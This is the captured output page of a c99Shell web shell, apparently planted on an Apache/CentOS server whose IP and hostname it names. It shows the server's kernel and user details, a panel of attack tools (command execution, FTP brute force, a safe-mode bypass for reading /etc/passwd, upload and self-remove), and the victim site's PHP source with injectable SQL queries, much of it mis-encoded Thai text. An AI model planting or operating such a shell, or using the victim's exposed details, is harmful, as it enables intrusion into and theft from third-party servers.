110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Plan_new/ drwxr-xr-x Free 52.64 GB of 127.8 GB (41.19%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Plan_new/ drwxr-xr-x
Free 52.64 GB of 127.8 GB (41.19%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: GrapMission.php (8.26 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

"; echo "

ЎГШіТ·УЎТГ Login ЎиН№

"; echo ""; exit(); } else { /** Check Session User Login */ /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../includes/Function.php" ); /** Chart */ include ("../includes/charts.php"); /** Create Database Object */ $dbObj = new DBConn; /** Config Table for This Page */ $myTable = "projectstdplan_tb"; $myTablePK = "Budget_Year"; $myTable2 = "project_type_tb"; $myTable2PK = "ProjectId"; $myTable3 = "project_tb"; $myTable3PK ="Project_code"; /* $queryUsr = " SELECT * FROM user_tb WHERE Username='$Username' "; $resultUsr = $dbObj->execQuery($queryUsr); $rss = $dbObj->fetchArray($resultUsr); */ //=== $query = " SELECT * FROM $myTable GROUP BY $myTablePK "; $result = $dbObj->execQuery($query); $num = $dbObj->_numrows; } # else ?> ўйНБЩЕбј№ґУа№Ф№§Т№бЕРГТВ§Т№

Л№йТЛЕСЎ » бј№АЩБФбКґ§ЁУ№З№а§Ф№·ХиµСй§µТБѕС№ёЎФЁГТВ»Х §»Б execQuery($query3); $rs3 = $dbObj->fetchArray($result3); $dbObj->freeresult($result3); echo $rs3['Budget_Year']; ?>

‹ ВйН№ЎЕСє

аЕЧНЎ»Х§є»ГРБТі

"; // Fetch all factory records $strQuery = " SELECT * FROM project_mission Where Budget_Year ='$Budget_Year' "; $result11 = $dbObj->execQuery($strQuery); //Iterate through each factory if ($result11) { while( $rs = $dbObj->fetchArray($result11) ) { $sql3 = "SELECT SUM(Budget_total) AS total FROM project_type_tb pt ,project_submission ps WHERE ps.missId='$rs[missId]' and pt.subId = ps.subId and pt.Budget_Year='$Budget_Year' "; $result3 = $dbObj->execQuery($sql3); $rs3 = $dbObj->fetchArray($result3); $sql = " SELECT SUM(Budget_use) AS SumB6 FROM project_tb p, project_type_tb pt WHERE pt.subId='$rs[subId]' and pt.Budget_Year='$Budget_Year' and p.ProjectId=pt.ProjectId "; $result6 = $dbObj->execQuery($sql); $rs6= $dbObj->fetchArray($result6); $strXML .= ""; //$strXML .= ""; } # while } # if //Finally, close element $strXML .= ""; //Create the chart - Pie 3D Chart with data from strXML echo renderChart("../charts/Column2D.swf", "", $strXML, "", 750, 375, false, false); ?>

freeresult($result); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]--